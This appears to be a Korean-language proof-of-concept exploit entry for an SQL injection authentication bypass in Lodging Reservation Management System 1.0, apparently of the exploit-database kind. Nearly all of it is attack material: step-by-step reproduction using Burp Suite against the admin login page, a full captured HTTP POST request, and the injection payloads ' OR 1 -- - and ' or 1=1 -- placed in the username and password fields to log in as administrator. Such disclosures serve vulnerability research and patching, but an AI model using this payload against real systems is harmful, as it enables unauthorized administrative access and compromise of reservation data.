
Lodging Reservation Management System 1.0의 SQL 주입 및 인증 우회에 대한 개념 증명 익스플로잇으로, 조작된 페이로드를 통해 무단 관리자 액세스를 가능하게 합니다.
#재현 단계: Step 1 제품 관리자 패널 http://localhost/lodge/admin/login.php로 이동합니다. Step 2 – 사용자 이름과 비밀번호에 아무 값이나 입력합니다. Step 3 – 로그인을 클릭하고 Burp Suite에서 요청을 캡처합니다. Step4 – 사용자 이름을 ' OR 1 -- - 로, 비밀번호를 ' OR 1 -- - 로 변경합니다. Step 5 – Forward를 클릭하면 관리자로 로그인됩니다.
POST /lodge/classes/Login.php?f=login HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Accept: / Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 49 Origin: http://localhost Connection: close Referer: http://localhost/lodge/admin/login.php Cookie: PHPSESSID=2fa01e7lg9vfhtspr2hs45va76 Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin
username=+'+or+1%3D1+--+&password=+'+or+1%3D1+--+
사용자 이름: ' or 1 -- - 비밀번호: ' or 1 -- -